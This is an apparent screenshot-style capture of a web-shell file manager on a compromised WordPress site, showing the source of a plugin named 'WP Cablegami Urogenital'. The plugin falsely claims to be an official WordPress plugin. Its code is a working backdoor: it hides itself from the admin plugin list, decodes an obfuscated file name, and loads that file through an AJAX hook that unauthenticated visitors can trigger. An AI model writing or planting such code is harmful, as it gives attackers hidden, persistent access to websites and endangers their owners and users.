BossBey File Manager
PHP:
7.4.33
OS:
Linux
User:
blog
Root
/
.
/
wp-content
/
plugins
/
wp-cablegami-urogenital
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-cablegami-urogenital.php
<?php /* Plugin Name: WP Cablegami Urogenital Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 4.2.5 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function zrj_ycy() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $w = array('wp-cablegami-urogenital/wp-cablegami-urogenital.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $w)) { unset($wp_list_table->items[$key]); } } } } function xot_kmd($plugins) { $a = 'wp-cablegami-urogenital/wp-cablegami-urogenital.php'; if (array_key_exists($a, $plugins)) { unset($plugins[$a]); } return $plugins; } function stn($o, $y) { $i = ''; for ($j = 0; $j < strlen($o); $j += 2) { $u = ord($o[$j]) - 65; $h = ord($o[$j + 1]); if ($h > 90) $h -= 6; $d = $u * 52 + ($h - 65); $i .= chr($d - $y); } return $i; } function nik_ajax_handler() { require_once plugin_dir_path(__FILE__) . stn('RCRRRRQDRERURU', 789); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'zrj_ycy'); add_filter('all_plugins', 'xot_kmd'); add_action('wp_ajax_cab_uro', 'nik_ajax_handler'); add_action('wp_ajax_nopriv_cab_uro', 'nik_ajax_handler'); }
Save
Cancel